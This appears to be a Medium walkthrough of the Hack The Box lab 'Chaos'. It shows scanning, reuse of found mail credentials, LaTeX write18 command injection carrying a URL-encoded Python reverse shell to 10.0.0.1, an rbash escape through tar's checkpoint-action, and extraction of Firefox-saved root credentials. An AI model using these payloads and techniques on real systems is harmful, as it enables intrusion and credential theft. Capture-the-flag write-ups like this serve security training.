HTB Chaos — Walkthrough

root@ArmourInfosec:~/ nmap -sV -sC -p- 10.10.10.152
Nmap scan report for 10.10.10.120
Host is up (0.24s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP STLS RESP-CODES PIPELINING SASL AUTH-RESP-CODE CAPA UIDL
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more have ID ENABLE IMAP4rev1 LITERAL+ post-login STARTTLS capabilities Pre-login OK LOGINDISABLEDA0001 listed LOGIN-REFERRALS IDLE SASL-IR
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more ID ENABLE IMAP4rev1 LITERAL+ have post-login AUTH=PLAINA0001 capabilities Pre-login OK listed LOGIN-REFERRALS IDLE SASL-IR
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN) RESP-CODES PIPELINING USER AUTH-RESP-CODE CAPA UIDL
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visit port number 80, and found a text “Direct IP Access Not Allowed”, On Brute forcing on http://10.10.10.120 and adding chaos.htb in /etc/hosts

root@ArmourInfosec:~# gobuster -u http://10.10.10.120 -w /usr/share/wordlists/dirb/common.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.120/
[+] Threads : 40
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/24 05:56:59 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
/wp (Status: 301)
=====================================================
2019/05/24 05:57:34 Finished
=====================================================

Inside /wp/wordpress found wordpress and a password protected blog which is written by a user human

On guessing its password I found it to be human

so opened it and found the following text

Creds for webmail :username — ayushpassword — jiujitsu

Tried to login to webmail server on port 10000 but failed to login then i remembered that there is pop3 server installed in the system i tried to login the pop3 server with this credentials

root@ArmourInfosec:~/# nc 10.10.10.120 110-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.

OK so we will try to connect at port 995 which is used for ssl/pop3 with openssl

root@ArmourInfosec:~/# openssl s_client -connect 10.10.10.120:995

Logged in successfully with this but didn’t found any email, to have a look at all emails sent, received and draft. I will use Thunderbird for this

Below are steps to connect to mail server with Thunderbird:

  1. Open Thunderbird
  2. You will find email under setup an account
  3. Then enter the username and password u got from WordPress, in email enter something@gmail.com and continue
  4. Then click Manual configuration and change authentication to normal password for both incoming and outgoing
  5. Then click on Advance Configuration then change your server name to machine ip and in username remove @gmail.com then click OK You are done then you need to click Read Message it will ask for password Enter the password and you will be connected

You can see a message in the draft there you get 2 files encrypt.py and enim_msg.txt and a message from ayush to sahay

Hii, sahay 
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush

So from this message we know that the password to decrypt is sahay and the encrypt.py is the script used to encrypt it, so we can make a script to decrypt the message

The script I made is below:

root@ArmourInfosec:~/# python decrypt.py
Enter filename: enim_msg.txt
Enter password: sahay

It will decrypt and make a file im_msg.txt which consist base64 encoded data to decrypt it cat im_msg.txt | base64 -d it will decode and will show following data

Hii SahayPlease check our new service which create pdfp.s — As you told me to encrypt important msg, i did :)http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3Thanks,
Ayush

So visiting http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

There is a webpage with title Testing PDF maker, and it is written that only one template is working, I tries all clicked on Create PDF but didn’t found any changes, then I tried to intercept the request and found a request as below

On testing i found working template to be test2, when I sent the request, in the response, I found that pdfTeX Version 3.14159265–2.6–1.40.19 is used and format of writing is pdflatex to generate PDF, after some research i found a link which gives idea about how to hijack pdflatex the link is here, some of it’s commands are blocked but I found useful code to inject system commands as \immediate\write18{id} this will execute the id command, to execute this in the content parameter insert \immediate\write18{env} and in template parameter insert test2 you will get response at the bottom with the output of the command

insert below command in content parameter

\immediate\write18{python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.0.0.1%22%2C1234%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27}

which is url encoding of simple python reverse shell code

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Fire up nc on required port and sent the request, as soon as you send the request you will get reverse connection to nc

Getting proper shell, spawning tty shell with python command python -c 'import pty;pty.spawn("/bin/bash")' , press ctrl+Z type command stty raw -echo then type fg you will get connection back, then type reset , if you are asked for terminal type press ctrl+C and you will get an interective shell then set TERM with the command export TERM=xterm-256color

Inside home directory i found two users ayush and sahay , on trying for same credentials which i found on WordPress blog for Ayush, so i will simply switch user to ayush with su ayush and enter the password jiujitsu and logged in successfully with this credentials but i got a restricted shell rbash

BYPASS Restricted Shell:

If we type any command in restricted shell which is not allowed it gives a error rbash: /usr/lib/command-not-found: restricted: cannot specify `/’ in command names so from here we knew that we have rbash shell after some research i found some of it’s commands like for directory listing we use dir, etc., now we have have to find out which commands we can use, for that er can see $PATH which holds the location of variables for this we simply need to type echo $PATH in shell which gives the location of binary we can access so the PATH location is /home/ayush/.app on listing it’s content with dir found three binaries dir, ping, tar. After some research I found a way with tar to bypass the restricted shell for that I used following command

ayush@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

and from this you will escape from restricted shell but still you can’t access all the commands for this we need to add /bin in our PATH variable for that simply type export PATH=$PATH:/bin after that you can access all the commands then just cd to /home and cat user.txt

eef39126d9c3b********6970dc713e1

After getting user I started searching for the way to root, I got some hints from forum that it is something related to Firefox, I found the Firefox installed by the directory at .mozilla at /home, I researches about it and found that Firefox can hold credentials for users in a system in it’s database files cert9.db and key4.db inside ~/.mozilla/firefox/bzo7sjt1.default when I looked at it the file size is very much as compared to newly installed which means that it holds some credentials, I found a script which can extract the credentials from Firefox database, it is a python script, link for script is here, Simply download it and run with python, I will user python HTTP Server to transfer it to the machine then simply run it with python as follows:

ayush@chaos:~/ python firefox_decrypt.py

this will give the credentials for root then you can simply switch user to root with su

ayush@chaos:~/ su root
password:
root@chaos:~/home/ayush# cd
root@chaos:~# cat root.txt

4eca7e09e35********4563cfbabbc70

--

--

--

Security Researcher | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

The Complete Guide to Cron and Launchd in macOS/Linux

Incident Recap — CZ’s Thoughts

Operations Research with R — Graphical Method

Implementing Agile for PM’s

Boxes and Lines — Intro

Simplified VPC FW Architecture

How Rust can be used to Implement a better Operating System — Part 2

Know more & more about Input-Output in C language

scanf() to print

Representation and Introduction of Graph

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vaibhav Joshi

Vaibhav Joshi

Security Researcher | OSCP

More from Medium

BruteLoops — Protocol Agnostic Online Password Guessing API

Hacker101 Micro-CMS v1 CTF Walkthrough

HTB Starting Point-Redeemer

[CTF] 1337up CTF - Blink’s Secret